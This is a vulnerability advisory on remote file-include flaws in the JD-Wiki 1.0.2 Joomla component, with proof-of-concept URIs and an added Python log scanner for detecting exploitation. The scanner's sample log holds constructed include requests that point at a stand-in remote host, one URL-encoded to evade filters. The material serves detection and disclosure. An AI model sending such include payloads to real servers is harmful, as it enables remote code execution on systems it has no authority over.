JD Wiki For Joomla Multiple Remote File Include Vulnerabilities
TITLE: JD Wiki For Joomla Multiple Remote File Include Vulnerabilities
CLASS: Input Validation Error
CVE:
REMOTE: Yes
LOCAL: No
PUBLISHED: Jun 06 2007 12:00AM
UPDATE: Jun 08 2007 08:10PM
CREDIT: DarkbiteX is credited with the discovery of these vulnerabilities.
VULNERABLE:
Joomla JD-Wiki 1.0.2
NOT VULNERABLE:
Joomla JD-Wiki 1.0.3
Discussion
JD-Wiki is prone to multiple remote file-include vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker can exploit these issues to include arbitrary remote files containing malicious PHP code and execute it in the context of the web-server process. This may allow the attacker to compromise the application and gain access to the underlying system.
JD-Wiki 1.0.2 and earlier versions are vulnerable to this issue; other versions may also be affected.
Exploit
Attackers can use a browser to exploit these issues.
The following proof-of-concept URIs are available:
http://www.example.com/components/com_jd-wiki/bin/dwpage.php?mosConfig_absolute_path=
http://www.example.com/components/com_jd-wiki/bin/wantedpages.php?mosConfig_absolute_path=
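As an added illustration (not part of the SecurityFocus advisory), the following Python snippet shows how a defender could sweep web-server access logs for requests to the two affected scripts whose mosConfig_absolute_path value carries a remote URL or PHP stream wrapper, which is what an include attempt against this issue looks like at the HTTP layer. The log lines and IP addresses are constructed for the example.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Scripts named in the advisory, relative to the Joomla web root.
AFFECTED_SCRIPTS = (
    "/components/com_jd-wiki/bin/dwpage.php",
    "/components/com_jd-wiki/bin/wantedpages.php",
)
PARAM = "mosConfig_absolute_path"
# Prefixes that would make a PHP include pull code from outside the site.
REMOTE_SCHEMES = ("http://", "https://", "ftp://", "php://", "data:")

# Common Log Format: client ident user [time] "METHOD request HTTP/x" status size
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) \S+" (\d{3})')

def is_rfi_attempt(request: str) -> bool:
    """True when the request targets an affected script and its
    mosConfig_absolute_path value starts with a remote scheme or wrapper."""
    parts = urlsplit(request)
    if parts.path not in AFFECTED_SCRIPTS:
        return False
    values = parse_qs(parts.query, keep_blank_values=True).get(PARAM, [])
    # parse_qs already decodes once; unquote again to catch double encoding.
    return any(unquote(v).strip().lower().startswith(REMOTE_SCHEMES)
               for v in values)

def scan_log(lines):
    """Return (client_ip, timestamp, request) for every flagged line."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        ip, ts, _method, request, _status = m.groups()
        if is_rfi_attempt(request):
            hits.append((ip, ts, request))
    return hits

# Constructed sample access-log lines (documentation IP ranges, not real traffic).
SAMPLE_LOG = [
    '203.0.113.7 - - [06/Jun/2007:10:15:01 +0000] "GET /components/com_jd-wiki/bin/dwpage.php?mosConfig_absolute_path=http://198.51.100.9/x.txt? HTTP/1.1" 200 512',
    '198.51.100.23 - - [06/Jun/2007:10:16:12 +0000] "GET /components/com_jd-wiki/bin/wantedpages.php?mosConfig_absolute_path=%68ttp://198.51.100.9/x.txt HTTP/1.1" 200 480',
    '192.0.2.5 - - [06/Jun/2007:10:17:00 +0000] "GET /components/com_jd-wiki/bin/dwpage.php?id=start HTTP/1.1" 200 2048',
]

if __name__ == "__main__":
    for ip, ts, request in scan_log(SAMPLE_LOG):
        print(f"{ts} {ip} possible remote include: {request}")
```

A 200 status on a flagged line is worth treating as a possible successful include rather than a blocked probe, since the vulnerable versions return normally after loading the remote file.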
Solution
The vendor has released JD-Wiki 1.0.3 to address these issues; please contact the vendor for details on obtaining fixes and upgrades. See the references for details.
References
- JD-Wiki Home Page (Joomla Developing)
- Joomla! Help Site - JD-Wiki (Joomla!)